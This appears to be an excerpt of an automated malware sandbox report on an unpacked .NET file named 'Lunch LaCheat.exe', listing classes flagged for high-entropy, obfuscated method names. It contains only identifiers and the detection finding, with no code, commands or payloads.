                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, SnxHSTqDkQ0SnKZtlax.csHigh entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 's6IhVny5iCelJ8n2iZ5', 'bMhYt5yciBLIP5L6eew', 'CX02B3ynMkPf0nmVUtp', 'oMPJH7yQv8t8cvAnt4I', 'NXqCtlyB1LE0DFyDUv4', 'EsokVRyI9Xb9FF5MMqS'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, zmTxvPtB3JXpW99rT2g.csHigh entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, nKFhZaGINSnlIuOGr6.csHigh entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'oU4K1Tb85', 'Dj5REmnlY70lckCAcCY', 'qqChvVnrHb4tv0pesFG', 'hJsE6fnDqDqZAxYKs03', 'eCPPmMnNVMOi2NJ8FYU', 'lIaM53n3hgmj0mlweVl'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, MZcSW5XFnMZt2tTbkg5.csHigh entropy of concatenated method names: 'Aj5CmemkBa', '_1kO', '_9v4', '_294', 'qpbCu8eZ1t', 'euj', 'MOiCRpBV8q', 'AeaC8rGIAN', 'o87', 'lb1Cho7prW'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, WWqZNXK75NEoPq9OON.csHigh entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'QNjyldQJYfb7F6L0bLM', 'ssMcBqQ2AgGWB1IgPnB', 'o2aqMYQ8P280noQTDmF', 'GSCGFYQGOiA1roIXyaY', 'PI3mSKQz1S28VLSo76D', 'dKVWDhB5Pf6DTg4wcVp'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, mVPDZufZM2W7mkK879j.csHigh entropy of concatenated method names: 'J2UMbVjRB6', 'wLOM18f94l', 'bRDM9RQIua', 'FCCMpiX6Rh', 'zCuMdgCvtb', 'VVjMcclkjW', 'cmGMTsVGNs', 'WvRvtyixcFHmYmeLPBl', 'vecaksi3AcyP4Q2SSkc', 'B21HkIitdPNVhIQbKia'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, jnVE0AqQ75AvvmYSO4D.csHigh entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'NEOdEQ0O8F4GBDd9q3v', 'ANwRux0vVtbqoP3mbIo', 'bf7KUY0LWWhMWRwFqNq', 'dTeDGm0MtXA15BKAT4q', 'MBV3610Ee14N1BUI0C4', 'IauNtu0CQvuFhNmEbxV'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, GXbGVUq9ec7tQ7QY4FA.csHigh entropy of concatenated method names: 'CorqlPm0EZ', 'dbCT6b9xt4SIjwGcTpo', 'Cc23qw9Hqw51fELBEUP', 'YqP1vO93KQCXtLglce7', 'qKypAP9tH44l4i9GFWP', 'Ut14gR9kUUP4DYoGUC0', 'QLw', 'YZ8', 'cC5', 'G9C'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, S4xuYYf4VvkDUfoJrma.csHigh entropy of concatenated method names: 'KmItHy8RCX', 'hfvtP2Yevb', 'fKgfm6XxBJm57GNKGjt', 'gkZKx3XHYrOWnbe0sTQ', 'vhEvxIX37eiiOpQw5vM', 'cdE2eEXtTCVwNauLgZc', 'JCtPOqXku8GaQnNosNH', 'erP1AoXgwSSZCm0IOnB', 'S1qVpaXj6TCm7j3DOi9', 'oFfOsFXFEYwfmI07iEk'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, spviIXXITu8HiQLRydd.csHigh entropy of concatenated method names: 'K20h4TKijO', 'P5uhVdQO1L', 'pn4hIRSyqM', 'ERehmlw0LM', 'wtphusGQWs', 'cLQyeou26FrYqdVs4PA', 'kwTChXu8ZTKPtB0WkkT', 'zkRfCquGBv3XTY00Tcp', 'yqmxEJuznAIeCmuCpIQ', 'jVq0sjh5xhViu2lD1ig'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, bjx4PUMNvrbRTipVjsL.csHigh entropy of concatenated method names: 'bSGuPSxCqQx8COVogUR', 'IZdvcXxpbntIBs2jPE1', 'wde6TExMAm1KLhlWrIY', 'IqpQkRxEW58S5H1aEn6', 'IWF', 'j72', 'hdI2ScsE9M', 'FTh2DLjhNr', 'j4z', 'APh23kPe0K'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, DNSXGhMxb8hbaZ3ZyOl.csHigh entropy of concatenated method names: '_9YY', '_57I', 'w51', 'bHN5MRYiSF', '_168', 'YE1x18tHjJndhXtjI9G', 'Es2Tc8tk1D98Hs9mLfo', 'mjdPxOtgNK89UKGrREt', 'MqejK6tjvtqcoqfFc80', 'rUdYc2tFBN5Bu275YvO'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, mGRo5IqgkpbCevtLJw4.csHigh entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'HlnkvJ7VPsCs6ZsASYh', 'YaUZWc7KWWp7fikmkBL', 'mFT2oW7Y3Kmq8Aaa870', 'T044587JtvcIy7SB7hw', 'PEtD9772RffA43EytyE', 'nCuIXI781myahKHrcWj'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, n5BLl0zub6q1E6cKtB.csHigh entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'Tr9Fr96QgZuIYdCN7KJ', 'h0hgxw6BnAWv6j2DTTg', 'hrl1Np6I3KlBF7Fw5PU', 'CxNYl1662OsmSNJRpj2', 'KwCnSn67Df9xTZgkGCj', 'bhXF276yG03fALrguhy'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, d1Ms4CUYfOkEyT4rV8O.csHigh entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, zyKIFSUOvZVd5nfJLNC.csHigh entropy of concatenated method names: 'qmhRTovydL', 'MDgRKRD95d', 'oPLRrjc0QR', 'I4ZRnSZmWU', 'EflRWEh8pQ', 'BShREYCj3FSd17ynq3w', 'M1aqNuCkx4yqBE7nkZQ', 'XhX3gfCgCHt5HO7OYOE', 'wlZqSiCFub9p6BpSV8G', 'kk00a4CbebRhf5yS9E1'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, wiSwb7XyiTFNRrZRITR.csHigh entropy of concatenated method names: 'P7f8owehxD', 'oer8EZtJhj', 'UaU8jJEEsk', 'b3M8xOxYte', 'XYR8FBIV12', 'CCe8Qhns0d', '_838', 'vVb', 'g24', '_9oL'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, LyW9xXtR93TyJkM7URN.csHigh entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'wqRHywrbJ1', '_3il', 'u0lHqijql3', 'gNKHfvtbRv', '_78N', 'z3K'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, JLb518Xu0gr7VgNrdQG.csHigh entropy of concatenated method names: 'IGD', 'CV5', 'yo0hR4v39K', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, zWT2AgqN8s5bxJgQo4x.csHigh entropy of concatenated method names: 'LU4fsRYhw6', 'koYq7XA6VkFOldRJlt5', 'ccRkdYA7c8aLwhFmU7A', 's94O9bABd6YMGKmZJR3', 'spfTZbAIiNkRdF5jqg4', 'kwVPm9AysBEtBOyjXnq', '_5q7', 'YZ8', '_6kf', 'G9C'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, Sb38j9M5TwPKU5E3N8P.csHigh entropy of concatenated method names: '_223', 'ObchL9DfKqx2y8KPI5B', 'zjyL8gDmB4BA5tX7Sfy', 'AwD8o0Dl8nau0GJDmZc', 'KcrNg3DrrGXhKKACSCj', 'doGS2gDDLcw7qKJHgUc', 'BGYtIMDNCUM0F2OihNl', 'KNcso5D3h3X9yXtwoPg', 'EWsr58DtvoPG6EmKuHn', 'hUx1kPDxpqXCnZMBpOj'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, hYxb1wtLnXrN0rRtimV.csHigh entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, I9vhRHquCQ0uLDtMftj.csHigh entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'm6JOx8yMVT2AMFy8MY0', 'iN5JtyyE8TQ2EHIq3IW', 'abuNRQyCZQ2s77Z74kO', 'UocsYxypvl32uvLQbW3', 'nU3W9ryo2MCKBXibePA', 'Pj5imPyuBcytTng08QB'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, ckfw2rtlq8EL44wGQV0.csHigh entropy of concatenated method names: 'rsKPLncwwW', 'L6sP9D7GLP', 'MY3PpHxxvt', 'DxqPdKmpmu', 'BmxPcxeGN8', 'KNWPTCeMTY', 'UR2PKMeayj', 'EiKPrlj1Li', 'yVFPnZuxop', 'BO6PW9RhMe'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, diijDZfkEAwvm72umcW.csHigh entropy of concatenated method names: 'CsNw8U53TQ', 'lJPbMhmS8Ct7f7ZO0ZG', 'yD6n0FmZlZeDciG0APA', 'OeK0bpmaqdd0OZNZgDw', 'oVKeupms4HPDKNBNLGA', 'Sbvr4MmVIw5cXP5kZdL', 'mmFw3GkEYg', 'sEAwshq5Hq', 'Db9w47p6oR', 'waSwV8Ztq9'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, w22xDBMq7bbo3Ga2veg.csHigh entropy of concatenated method names: 'a1vwCr4fti', 'H9mw0we9aC', 'H0awGgssIu', 'yMIwbRkDE9', 'WYHFxumzDsJZ9jDMjSS', 'jEYH21m8eJJ0NNVD1em', 'Yvp70SmGvJRg5At98tT', 'wyuwNBl5bUYGD9NeyHR', 'DttIPmlcBQFUZdNx5p9', 'U98xMblnDjicSGj2F1B'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, whZPVLpQKsuh7sYp2i.csHigh entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'usrtRen8XF05jgBeSKi', 'iA6vWdnGYWrQkMlHeC4', 'l7OCiwnzMUcQmb87Osk', 'nC8VUBQ5xMr7HXTLLeK', 'uhMiPYQcaVJ4N9J6BUD', 'xMoQmfQnNypsK1NrACC'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, U9iiGtqq03BTIAdKv3Z.csHigh entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'MWp64P6l3ipq2GQuntq', 'NKk4Cp6rF0ol1VXhsFw', 'qMa3Jf6DVGAjhyhE3Gk', 'CQ7w8K6NJoBOIue0qoV', 'W5ZNGH63RabL7XgnpOX', 'ciHJmY6t1kLtuVC1IHH'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, a8RCXJfyfv2YevbKcJy.csHigh entropy of concatenated method names: 'B1if86EUeO', 'S19fhnlUDc', 'q8LfOHkBZc', 'i8PI4bAvDM9b9C1Xgh1', 'Cjs6HFALJ6AotLk64Gn', 'k7tPmVAMa10WT9riQZC', 'RK6pTsAE4SL2ivvxpdm', 'A6du3SACOq2v6xgKLiP', 'Jh5fROApOWD9HUyQRqh', 'VakGRmA1KCKrxMSk1r5'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, HhoQgiQALbTCJrMygA.csHigh entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'QiiUNSIXBAa3MTvUOCu', 'FMZ4lwIWh3SWU7SMwhc', 'Dvab0iIwYdJln3b6nk9', 'QBsabpIfvHk0tYu8ngM', 'CGH9NqImjKdoJaB95FM', 'MjsYO4Ilq6RGO1ZSVb9'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, COtroIUMm4eTIhOVxcs.csHigh entropy of concatenated method names: 'TuZJLpv3X3ZUXuQfMa8', 'DF0hVAvt5o5TjW3LAAV', 'CbpBQ2vDPJtbSFjQn9Q', 'K06NIQvNmxcx4okoToY', 'pU54RJwarE', 'qNaD9IvkyZLLLSYXZ2n', 'VaPEBQvglhuPkTng7gV', 'IN55Q0vxkE4ufGioIQp', 'oqy7ePvHEFuZLvApOym', 'CwS4T7vjvRGJ6EdnGY3'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, vf0yC3MIHlCBxsJ9ID0.csHigh entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'tpM09X3i2kDDKar9Dx1', 'Jf8Z0S3PleVt01dPpCm', 's3WKbg3X3ht23eatxyW', 'zs5Vnd3WtIuHS3SNqll'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, DNaNPDq8ZrMGeZQIvVs.csHigh entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'E8lgLoy4DIupouCkFA4', 'qfMJ48yZiBo1MF6E6xD', 'Dnsdi7yadExYH8nmDvK', 'aaZ2GJySG17b0RKM8v6', 'ruelhNys0Mlegy5yhFb', 'EmpKriyV2eww67jAxOj'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, yDct3lUiBGykwYgZyNe.csHigh entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'Ywp8uokPlx', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, kNoIPAUkfQUI8omLQgL.csHigh entropy of concatenated method names: 'FBq8eOs3Gj', 'iYk8aS7c0M', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'BhA8CKD54d', '_5f9', 'A6Y'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, JrnQWOUZjgUWBocdi9j.csHigh entropy of concatenated method names: 'MBRR4bRWZh', 'dljRVGDLuG', 'beok0xEKNU8oE97cVXm', 'gdJirtEYGwQsYO7TH7X', 'G79xv5EJNEIAhGT5SiY', 'QoDxrPE2nhOSeIhOmfP', 'K3u9F7E8gfcuJwL8ZKH', 'XY1BBlEGogCG7BLkJjZ', 'IWvHJ4EzyO62oyRATuK', 'ooaaDoC5R7I1otPmy6D'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, bakGY7MAQ9F1Mugfu6e.csHigh entropy of concatenated method names: '_5u9', 'spk5eP4tNn', 'TM82y63WOc', 'xlo5n38cPv', 'ijDmsq32Cuo0nkm71h4', 'pmmlbH38FgC7IgeCmJx', 'NW4GNa3GCqSCis5YyYb', 'mWl4Li3YuWPoZcZMbjd', 'km51sx3JGusXZGV2HKS', 'qjQnvL3zVIiVitrQV2c'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, xDRQIuqra1CCiX6RhhC.csHigh entropy of concatenated method names: 'WoGfqhwXAd', 'YrnffWIkRQ', 'r7XfMuFUTP', 'PYTUgp9slmjF66T3pwk', 'Ia5Xxi9Vf27RNkwaMvK', 'WrE7er9aBcWYBHcsRZ6', 'TaeQa99STGLKXrARlj9', 'aPsyRx9KgUfkIPH8rdh', 'KFxKGc9YHNCliTOGYpD', 'QgrFic9JXw9Kxa2Ttx1'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, nfeO3JM26UEN4nRJB4s.csHigh entropy of concatenated method names: 'ryxJ1InLAp', 'RHUJ9E29Lj', 'oSNJpITRLy', 'G2fDwUDPjNV9ZqkedFq', 'syRVjODRUQgkNx8k4KP', 'MG67KADi32EoMii2f3c', 'sT2QmfDXYPr5JaU64AZ', 'QOpJ7GmX6g', 'QfIJgjDLxw', 'acyJSkOeR2'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, u7wHE5XO1AwJPYHADRh.csHigh entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, wvbMxJXf3x1mW0ua4by.csHigh entropy of concatenated method names: 'vqbhJIrxhk', 'XIphZm7Lvs', '_8r1', 'ld4h2Y3rX2', 'Rw8hBdLFuK', 'D4Vh6BjHGm', 'ctAh5E2Uxm', 'sglmWPuWU0lZAiHDmmf', 'ORxqW4uwxm5BQ07tA5t', 'w4VfNvufi4GME3bSXCO'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, AjATmTqxd3qnyspZ8M5.csHigh entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'HRIIYd0DFlTC15rYUVP', 'mfIPn10NrKEZSHpfdli', 'PNnWnR03P9hG97s8Bl3', 'jSP2Cd0tWTrMIgKLQvC', 'HqKcYM0x20fOVq54Itl', 'RtP49V0H5kTojw65eOq'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, tuX3ojf34ChaxjRV6c1.csHigh entropy of concatenated method names: 'ghyMzmrMjj', 'GmityahLUc', 'XnGtqsvKl7', 'CwUtfEAeQC', 'gjXtMu01OW', 'J2Attg8s5b', 'QJgtUQo4xj', 'q40tXDejK9', 't9HtwGj4xZ', 'oEntJkXhwB'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, dTG2gXqPUXjsYC5a9HK.csHigh entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'gfA0Ju7oAp3APN5QL3C', 'eZuBA77ufnak5Wpyrgk', 'Dw99V67ha1rIRYe4Vq3', 'Hntrf37TKJpcDOdMdxc', 'jTckxA7UpNRoPA5bZOJ', 'XRP1sP7eydMZwiP1WHa'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, sHZJEsfKSVh1hmkvGfT.csHigh entropy of concatenated method names: 'zu5XJPnKAU', 'zwnXZTO1PP', 'doVHscfY2QU7y7n3M6h', 'DHJBGlfJchy0NpVeDY1', 'LdV8eMfVkHTJJlF33VL', 'bBU0WFfKxvYr9Xmxf1T', 'WijXSDZEAw', 'MrPWHnm50A7nn7X0Nbk', 'YvnqISmcdn5vSrLYj2i', 'LMfGohfGAKwhojfkFgx'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, COhgSqfcQyyy2PSOJQt.csHigh entropy of concatenated method names: '_0023Nn', 'Dispose', 'VSZU9M3hJ2', 'C35Upi0Ohg', 'pqQUdyyy2P', 'pOJUcQtL6R', 'CIsUTckToo', 'YXanqqfqhHSyA5ZR5IF', 'tOWOCQf9atQ2ptEERAZ', 'qlcaEGf7oTCAAyOB3oA'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, IYPXUgwBGoP6ag9jkCy.csHigh entropy of concatenated method names: 'c2HFvottUIahn', 'woorDbdXE0xTAYhMF0X', 'uNoJwbdW3AWhGTAQrxp', 'VnGffcdwfhM8aLCcLn8', 'SdFVEVdfu82GL510GMs', 'H9mrWodm0RYjQ0ahgOh', 'IIbfdRdixl71rfT5QOD', 'vAv2eFdPIA5BilCQAop', 'axohCLdl4aoI35uNqyP', 'rPVPQkdrFr6cLrseYA7'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, KhVMlxXdSTGZrYZBTyq.csHigh entropy of concatenated method names: 'kjMacqd8Y1', 'dFM8QiUbOiNT3Wlx0o2', 'pAyrlDU1lyp62ZjBqB9', 'C38oNPUj1lyraUDysZK', 'w6QCLhUF0jmyoJeOycs', '_1fi', 'ILXeQHPI2t', '_676', 'IG9', 'mdP'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, kMDXZWXajKvT3fbPySM.csHigh entropy of concatenated method names: 'so7OZOmXcS', 'seBO2wr13U', 'Wx0OBVxFAh', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'BgAO6GC7rc'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, t7eqoCq0pyA24xXUAbH.csHigh entropy of concatenated method names: 'evhqoFZ4P6', 'JsQfJC9ns5pCW5j6Tnf', 'JAoZp69QZvQqimDDTpb', 'pCKSdX95nALImpr7vLg', 'Y3k8MI9cPRFS30v5Oyr', 'UVr5F79BUJGC0yGL74u', 'wo6Vld9IE4g2E8H1jLL', 'B63ltQ96yh2GL5gwWIl', 'oiAqjLbTCJ', 'ECTyE49qwm3bGTHUN6L'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, LdmVhiXGwe9HapiwJ8M.csHigh entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'TAXO8Cmnut', 'vrLOhm8dlH', 'lcQOOs0Sxx', 'zIYOeFJCIF', 'R5aOahOv5j', 'PslOCWUtKC', 'et4lt6TCIDuEr6rKuQq'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, UhmLkBf9fCvwgVYUfIA.csHigh entropy of concatenated method names: 'qlhUCmLkBf', 'AAWA8rw8JUlo7bj2IaY', 'aX3CKrwGKWf2XWiRpaP', 'KBeZMSwJJIVXm09Apou', 'hyc9HQw2JR8whLRhLc7', 'n00GNtwzblx8nC54JSQ', 'aeNhdAf5DcNWWJ3tCm5', 'kJ3fdTfcnhvxlTjh2c9', 'xKmModfnBy0oOACwRu5', 'hdv74ffQZ2tmZ3HEhpS'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, GmeW25faKmNu3TDH8lC.csHigh entropy of concatenated method names: 'm6ItLu1ZjH', 'WVLtkWQbIi', 'iQ4tzxuYYV', 'VkDUyUfoJr', 'varUq8YInh', 'Bv1UfxxBty', 'jpeUMd3Gwn', 'ffrUt61Kw5', 'EYYUUZrHdC', 'KfNEPTWYJNYa4KaQ8lI'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, AM3dUaMPMLKtx58w5dK.csHigh entropy of concatenated method names: 'AOVJWefvU5', 'VUSJAFTekW', 'QAXJopur5Z', 'f8kJE1fDDg', 'mNZBiUDLQdo7fX17ZBY', 'wGIy5jDMdiueJuQpas0', 'W3TALFDEgsuXNX9Z2is', 'AT5QLEDOyuw53EOOgdu', 'pruHwBDvqlqlFTXC7gs', 'gww8HDDCKEfkOOWGwbE'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, EU7jgPqZUfCh0MEvB0O.csHigh entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'JTKaa4777mfR36hCoHA', 'CpD0lE7yQdshseIwquJ', 'iH8cej7qsWR75prafpN', 'IZHsn479V12L7VHBJSQ', 'BgoW2570jjuUXFQBHNp', 'DUnnj07Ato88UNW52uw'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, Ahc13dEy5KVP0BqE5E.csHigh entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'hAMy1mBUDwEx2rXOl6l', 'loUJM1BeEu05t5cAgSC', 'xLwah6BdvRdcaJCgeFK', 'zIsF8oB4Ohst4mZHOyW', 'mDtiQxBZULvupYnONMx', 'vF1ADbBaBIOnm7Prudn'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, LgEDIqhS04Car44Mop.csHigh entropy of concatenated method names: 'NJU99NQHq', 'RsnpVi0BZ', 'aAbdKrsDq', 'N3wegKcpgHwR2rr6u6Q', 'pYUR3lcEmMv2RIKJGbt', 'RYkQYscCtfQBwZ1qBsZ', 'py1TVDcoUrIscPVoM4j', 'n1yueqcu6FT4hHhRbcA', 'ejkrQIchrKMglcNdyH3', 'o80D58cT8bTeg0STeY8'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, TKA1axtODGwCsrAJYh2.csHigh entropy of concatenated method names: 'Dh9H1AxGpk', 'ULMH9RCGyd', 'Cx4Hp0QPMN', 'Ws7HdhJ44i', 'x8EHc1HL9o', 'rvHxM6glc1lvMehJWYV', 'RM55FGgfhTvBvTKUYZc', 'UOdxNegmV0i8bkOLHSx', 'gx7WIkgrCmroZnH364u', 'PgomNSgDf3esDNSHfV7'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, f8k1fDtZDguyRu368hC.csHigh entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, SUHxo9tNj7gNTsIAV05.csHigh entropy of concatenated method names: 'ASg78iHlfC', 'JRI7O6QNB4', 'oHo7HOv6uy', 'PSQ7PChfg4', 'GQh77QXcEE', 'luM7g4nfsA', 'Rp47S9GewM', 'wvG7DiND8G', 'KHj73v7iMn', 'MNF7s8pjhS'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, B0A2YIMzsWk7TS3uGdI.csHigh entropy of concatenated method names: 'QTZ2eYxb1w', 'MXr2aN0rRt', 'WmV2CoLnj2', 'TScQVcxhu1qXlhrMr6t', 'PjP3fgxTEVoLdOOUAtu', 'mS7e1FxokiJEbe4YJnK', 'dplGFjxutbvFpXvFTTi', 'vRoDi4xU3vHRgsJ91bH', 'wBhsrsxeOfq7uBa21LJ', 'ciuqhXxdPoS2OJgR3ju'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, yhRfLWt3k6bdGWArgmH.csHigh entropy of concatenated method names: '_7zt', 'Y2d5s7UQpN', 'L1I540HfXH', 'faI5VYRTcn', 'wS15I7tZAN', 'U1c5mxNXvh', 'Hg45uEn0ui', 'YqOicPk3qIJeIYTLNQ6', 'RowPfGktZ4vKdmJ6ayU', 'rOFyxvkDgj86hX7gl20'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, eCD4fOt5DPq948iwBGO.csHigh entropy of concatenated method names: 'erL6pJNwl4', 'tfI6drG2CP', 'C6N6coIPAf', 'SUI6T8omLQ', 'oLr6Kbe96U', 'MWA0wjHGk5xg7L7C3eq', 'Cic4tYHzZ5EcG8VYmr7', 'X7giRhH2Nb6hPeHOJjT', 'G7dIpfH8Om3Lwn6sjKJ', 'vTaFAWk5NyM67DkM9Ki'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, Vb95fHU00YbhYDyu0gn.csHigh entropy of concatenated method names: 'qw5RjX5E4u', 'WK7RxA3kvh', 'DlyRFaKs7R', 'zaAZ6uCuOTrQQCO836R', 'dOL0plCpeVIMNhkew1d', 'BXmpOuCoUwnUe5BCqio', 'P6QUBJChv4C6xiEa0O0', 'jKMcgZCTWOkPwYQSAdq', 'pxHyKRCUvWKMttg2kcZ', 'NNfEdpCe43h4k4Xao3h'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, VMFniGxPuBqy8bufcO.csHigh entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'zPLBIJI6EAx2AuarbQN', 'a8VU2NI7hlQURo19q9X', 'Sem2FAIyQ0lGs9g5Jv3', 'mNTkmRIqiiVNQEglCu2', 'VHvEa4I9VtmwOVg7hUC', 'RFU3TgI0utCXWLQGj4R'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, qlXAoh1gngc2opxxXE.csHigh entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'aylWtpi92', 'bkRHbAnMkiHllHmNCPr', 'zfe9y2nEZHlKM4NJHNc', 'ySuEJOnCRbb7HMHeWFd', 'bjiC8nnp0SmrslLefZW', 'oTUm6dnoR9vFeGY0KSB'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, ScE4clqkd8XEwfbUW0Q.csHigh entropy of concatenated method names: 'OH3fmYWQbU', 'njgfuPUfCh', 'CMEfRvB0Oc', 'lYYCbQA0gq0hdyRggSO', 'jA3j8uAqlS3WG0i99jj', 'BAUOatA9ivHQqX57BbY', 'fPfRJmAAPsbnU2HAHFy', 'zpOlMpARosx03mAD4Fm', 'xatfDuAiR0j7IYdrLRh', 'IACDsBAPpipjifvZXUl'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, USnMqttFK6BlomrJdIc.csHigh entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'GjkP7CybKT', 'XmhPgyvQWU', 'r8j', 'LS1', '_55S'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, h6vuwetSTCvG7UVGrTy.csHigh entropy of concatenated method names: 'QXj5tbqNGh', 'EHN5UH0y3X', 'Niq5XVfIUT', 'pZaAH1kw9m1BCP98Ddp', 'dYDMN1kfqlvFXkd8234', 'lh7iiZkXQpwkl5pn0BU', 'gVrcfykWg6G2SRfcUtA', 'sAYATckmVN2tioX9gJ0', 'uSPpnyklCeAGqHelk9u', 'G3Zg4mkrR64KQ4AJyYl'
